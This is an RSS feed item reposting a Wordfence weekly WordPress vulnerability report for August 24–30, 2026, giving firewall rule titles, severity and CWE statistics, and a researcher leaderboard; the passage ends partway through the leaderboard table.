<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Swift Website Updates &amp; Maintenance</title>
	<atom:link href="https://swiftupdates.ca/feed/" rel="self" type="application/rss+xml" />
	<link>https://swiftupdates.ca</link>
	<description>Swift Website Updates &#124; Wordpress Support</description>
	<lastBuildDate>Thu, 03 Sep 2026 19:39:47 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.4</generator>

<image>
	<url>https://swiftupdates.ca/wp-content/uploads/2022/11/Screen-Shot-2022-11-10-at-1.41.01-PM.png</url>
	<title>Swift Website Updates &amp; Maintenance</title>
	<link>https://swiftupdates.ca</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Wordfence Intelligence Weekly WordPress Vulnerability Report (August 24, 2026 to August 30, 2026)</title>
		<link>https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-24-2026-to-august-30-2026/</link>
		
		<dc:creator><![CDATA[Simon Browning]]></dc:creator>
		<pubDate>Thu, 03 Sep 2026 19:39:47 +0000</pubDate>
				<category><![CDATA[Feed]]></category>
		<guid isPermaLink="false">https://swiftupdates.ca/wordfence-intelligence-weekly-wordpress-vulnerability-report-august-24-2026-to-august-30-2026/</guid>

					<description><![CDATA[Last week, there were 246 vulnerabilities disclosed in 174 WordPress Plugins and 5 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 121 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected. Our mission with [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Last week, there were 246 vulnerabilities disclosed in 174 WordPress Plugins and 5 WordPress Themes that have been added to the Wordfence Intelligence Vulnerability Database, and there were 121 Vulnerability Researchers that contributed to WordPress Security last week. <b>Review those vulnerabilities in this report now to ensure your site is not affected.</b></p>
<p>Our mission with Wordfence Intelligence is to make valuable vulnerability information easily accessible to everyone, like the WordPress community, so individuals and organizations alike can utilize that data<strong> to implement layered security, aligning with our overarching mission to secure WordPress with defense in depth strategies.</strong> That is why the Wordfence Intelligence <a href="https://www.wordfence.com/threat-intel/" target="_blank" rel="noopener">user interface</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability API</a>, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a>, and <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> are all completely free to access and utilize both personally and commercially, and why we are running this weekly vulnerability report. As the <a href="https://www.wordfence.com/blog/2025/04/wordfence-the-worlds-leading-quality-wordpress-vulnerability-intelligence-provider/" target="_blank" rel="noopener">world’s leading quality vulnerability database</a> provider for WordPress, site owners can rest assured knowing Wordfence has their back.</p>
<p>Enterprises, Hosting Providers, and even Individuals can use the <a href="https://www.wordfence.com/products/wordfence-cli/" target="_blank" rel="noopener">Wordfence CLI Vulnerability Scanner</a> to run regular vulnerability scans across the sites they protect. Or alternatively, utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence/v3-accessing-and-consuming-the-vulnerability-data-feed/" target="_blank" rel="noopener">vulnerability Database API</a> to receive a complete dump of our <strong>database of over 35,000 vulnerabilities</strong> and then utilize the <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">webhook integration</a> to stay on top of the newest vulnerabilities added in real-time, as well as any updates made to the database, <strong>all for free</strong>.</p>
<p><em><a href="https://www.wordfence.com/subscribe-to-the-wordfence-email-list/" target="_blank" rel="noopener">Click here to sign-up for our mailing list</a> to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.</em></p>
<hr>
<h3><a></a>New Firewall Rules Deployed Last Week</h3>
<p>The Wordfence Threat Intelligence Team reviews each vulnerability to determine impact and severity, along with assessing the likelihood of exploitation, to verify that the Wordfence Firewall provides sufficient protection.</p>
<p>The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers last week:</p>
<ul>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/infusedwooPRO/infusedwoo-pro-5118-authenticated-subscriber-privilege-escalation-via-password-reset-link-disclosure" target="_blank" rel="noopener">InfusedWoo Pro &lt;= 5.1.18 – Authenticated (Subscriber+) Privilege Escalation via Password Reset Link Disclosure</a></li>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpematico/wpematico-rss-feed-fetcher-2824-authenticated-subscriber-privilege-escalation-via-arbitrary-option-update-to-wpematico-import-settings-admin-action" target="_blank" rel="noopener">WPeMatico RSS Feed Fetcher &lt;= 2.8.24 – Authenticated (Subscriber+) Privilege Escalation via Arbitrary Option Update to wpematico_import_settings admin_action</a></li>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpmudev-updates/wpmu-dev-dashboard-501-authentication-bypass-to-administrator-via-sso-hmac-canonicalization-confusion" target="_blank" rel="noopener">WPMU DEV Dashboard &lt;= 5.0.1 – Authentication Bypass to Administrator via SSO HMAC Canonicalization Confusion</a></li>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent/wplp-cookie-consent-441-unauthenticated-arbitrary-file-upload-via-upload-logo-rest-endpoint" target="_blank" rel="noopener">WPLP Cookie Consent &lt;= 4.4.1 – Unauthenticated Arbitrary File Upload via ‘upload-logo’ REST Endpoint</a></li>
<li>WAF-RULE-953 – Data redacted while we work with the vendor on a patch.</li>
<li>WAF-RULE-955 – Data redacted while we work with the vendor on a patch.</li>
</ul>
<p>Wordfence <a href="https://www.wordfence.com/products/wordfence-premium/" target="_blank" rel="noopener">Premium</a>, <a href="https://www.wordfence.com/products/wordfence-care/" target="_blank" rel="noopener">Care</a>, and <a href="https://www.wordfence.com/products/wordfence-response/" target="_blank" rel="noopener">Response</a> customers received this protection immediately, while users still running the free version of Wordfence will receive this enhanced protection after a 30 day delay.</p>
<hr>
<h3>Total Unpatched &amp; Patched Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table patched-status">
<tr>
<th class="text-center w-50">Patch Status</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Patched</td>
<td class="total text-center">234</td>
</tr>
<tr>
<td class="text-center">Unpatched</td>
<td class="total text-center">12</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CVSS Severity Last Week</h3>
</p>
<table class="wfvr-list-table cvss-counts">
<tr>
<th class="text-center w-50">Severity Rating</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td class="text-center">Low Severity</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td class="text-center">Medium Severity</td>
<td class="total text-center">153</td>
</tr>
<tr>
<td class="text-center">High Severity</td>
<td class="total text-center">73</td>
</tr>
<tr>
<td class="text-center">Critical Severity</td>
<td class="total text-center">18</td>
</tr>
</table>
<hr>
<h3>Total Vulnerabilities by CWE Type Last Week</h3>
</p>
<table class="wfvr-list-table cwe-counts">
<tr>
<th class="text-center w-50">Vulnerability Type by CWE</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>Improper Neutralization of Input During Web Page Generation (&#8216;Cross-site Scripting&#8217;)</td>
<td class="total text-center">57</td>
</tr>
<tr>
<td>Missing Authorization</td>
<td class="total text-center">46</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)</td>
<td class="total text-center">22</td>
</tr>
<tr>
<td>Authorization Bypass Through User-Controlled Key</td>
<td class="total text-center">16</td>
</tr>
<tr>
<td>Exposure of Sensitive Information to an Unauthorized Actor</td>
<td class="total text-center">14</td>
</tr>
<tr>
<td>Improper Limitation of a Pathname to a Restricted Directory (&#8216;Path Traversal&#8217;)</td>
<td class="total text-center">14</td>
</tr>
<tr>
<td>Improper Privilege Management</td>
<td class="total text-center">13</td>
</tr>
<tr>
<td>Improper Control of Generation of Code (&#8216;Code Injection&#8217;)</td>
<td class="total text-center">10</td>
</tr>
<tr>
<td>Deserialization of Untrusted Data</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>Unrestricted Upload of File with Dangerous Type</td>
<td class="total text-center">8</td>
</tr>
<tr>
<td>Cross-Site Request Forgery (CSRF)</td>
<td class="total text-center">7</td>
</tr>
<tr>
<td>Client-Side Enforcement of Server-Side Security</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Server-Side Request Forgery (SSRF)</td>
<td class="total text-center">5</td>
</tr>
<tr>
<td>Improper Authentication</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>Authentication Bypass by Alternate Name</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Authentication Bypass Using an Alternate Path or Channel</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Missing Authentication for Critical Function</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>Embedded Malicious Code</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Generation of Predictable Numbers or Identifiers</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Guessable CAPTCHA</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Control of Filename for Include/Require Statement in PHP Program (&#8216;PHP Remote File Inclusion&#8217;)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Neutralization of Special Elements in Output Used by a Downstream Component (&#8216;Injection&#8217;)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Improper Verification of Cryptographic Signature</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Insufficient Verification of Data Authenticity</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Uncontrolled Resource Consumption</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>URL Redirection to Untrusted Site (&#8216;Open Redirect&#8217;)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)</td>
<td class="total text-center">1</td>
</tr>
<tr>
<td>Weak Password Recovery Mechanism for Forgotten Password</td>
<td class="total text-center">1</td>
</tr>
</table>
<hr>
<h3><a></a>Researchers That Contributed to WordPress Security Last Week</h3>
</p>
<table class="wfvr-list-table researcher-list">
<tr>
<th class="text-center w-50">Researcher Name</th>
<th class="total text-center">Number of Vulnerabilities</th>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a>
				</div>
</p></div>
</td>
<td class="total text-center">17</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a>
				</div>
</p></div>
</td>
<td class="total text-center">14</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a>
				</div>
</p></div>
</td>
<td class="total text-center">12</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a>
				</div>
</p></div>
</td>
<td class="total text-center">12</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a>
				</div>
</p></div>
</td>
<td class="total text-center">9</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/erwan" target="_blank" rel="noopener">Erwan LR</a>
				</div>
</p></div>
</td>
<td class="total text-center">9</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a>
				</div>
</p></div>
</td>
<td class="total text-center">7</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/da87f3eddb4ac7ac5ccd63ae400c168c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="da87f3eddb4ac7ac5ccd63ae400c168c"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sai-praneeth-koti" target="_blank" rel="noopener">Sai Praneeth Koti</a>
				</div>
</p></div>
</td>
<td class="total text-center">7</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3dd75d22cf7caf7fb02d4911f1dbfa51.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3dd75d22cf7caf7fb02d4911f1dbfa51"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/sungbyeongchan" target="_blank" rel="noopener">sungbyeongchan</a>
				</div>
</p></div>
</td>
<td class="total text-center">6</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/45ae3007a457a80b6d668a0c9853b980.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ae3007a457a80b6d668a0c9853b980"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s-2" target="_blank" rel="noopener">Supakiad S.</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/5289964fa4dd52b6eccff68e7a6df156.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5289964fa4dd52b6eccff68e7a6df156"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vaibhav-narkhede-2" target="_blank" rel="noopener">Vaibhav Narkhede</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a>
				</div>
</p></div>
</td>
<td class="total text-center">4</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/9ce567c2aebe49665baff705399d2e66.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9ce567c2aebe49665baff705399d2e66"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/meher-sudhakar-abbireddi" target="_blank" rel="noopener">Meher Sudhakar Abbireddi</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2290ce797e74f0d83f941dfac9af5ed1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2290ce797e74f0d83f941dfac9af5ed1"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/usama-arshad" target="_blank" rel="noopener">Usama Arshad</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a>
				</div>
</p></div>
</td>
<td class="total text-center">3</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/74fa29fe487ebb2c3bbadcdeb61d8fd3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="74fa29fe487ebb2c3bbadcdeb61d8fd3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-ramos-maciel" target="_blank" rel="noopener">João Ramos Maciel</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/d38c2bce8856249cf398ccf5a50ebe63.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d38c2bce8856249cf398ccf5a50ebe63"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truonglv1-from-fpt-night-wolf" target="_blank" rel="noopener">TruongLV1 From FPT Night Wolf</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/cd164c6348ca2048a891d26c4106e94a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd164c6348ca2048a891d26c4106e94a"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener">Jack Taylor</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/1732348be5694e5c9a42ec41f1987218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1732348be5694e5c9a42ec41f1987218"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/huynh-kien-minh" target="_blank" rel="noopener">Huynh Kien Minh</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/a088a81982e769094818c68ff02325e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a088a81982e769094818c68ff02325e8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/vdsec" target="_blank" rel="noopener">VDsec</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dacc17a271a6378d63177b8dbe4c6a05.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dacc17a271a6378d63177b8dbe4c6a05"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/khaled-alenazi-2" target="_blank" rel="noopener">Khaled Alenazi</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/01c3929fe6b851d3cf7bda3c0215f691.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01c3929fe6b851d3cf7bda3c0215f691"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alex-thomas" target="_blank" rel="noopener">Alex Thomas</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/f97767e14ecb84ebfb6efdeaad2ee129.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f97767e14ecb84ebfb6efdeaad2ee129"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/argus" target="_blank" rel="noopener">Wordfence Argus</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/378ee82a41d6ac71e897c1fb256f3e84.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="378ee82a41d6ac71e897c1fb256f3e84"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/farid-narimanov-2" target="_blank" rel="noopener">Farid Narimanov</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2bbb850fa7caee630973169f68ae8160.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2bbb850fa7caee630973169f68ae8160"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kimsunghoon" target="_blank" rel="noopener">kimsunghoon</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/0f962dd7143eb1e6e46c9632a10cf4cf.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0f962dd7143eb1e6e46c9632a10cf4cf"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yuto-hyakumoto" target="_blank" rel="noopener">Yuto Hyakumoto</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/585bd77d4bbe100a43b04223fd09a74f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="585bd77d4bbe100a43b04223fd09a74f"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener">João Pedro Soares de Alcântara</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/eefe3705b8f48b48303d7a95fe7a0ec3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="eefe3705b8f48b48303d7a95fe7a0ec3"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener">Adrien Brunner</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/c1848da8ace36e65db046cca318ee343.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c1848da8ace36e65db046cca318ee343"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shivamani-vastrala" target="_blank" rel="noopener">Shivamani Vastrala</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/2c141f36c58aa14b55fc2863ae33e5d8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2c141f36c58aa14b55fc2863ae33e5d8"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jashid-sany" target="_blank" rel="noopener">Jashid Sany</a>
				</div>
</p></div>
</td>
<td class="total text-center">2</td>
</tr>
<tr>
<td>
<div class="d-flex justify-content-between align-items-center">
<div>
					<img decoding="async" src="https://www.gravatar.com/avatar/dd20b99aec2d2287d2a86d71af4da7e5.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="dd20b99aec2d2287d2a86d71af4da7e5"><br />
					<a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shhriyash" target="_blank" rel="noopener">Shhriyash</a>
				</div>
</p></div>
</td>
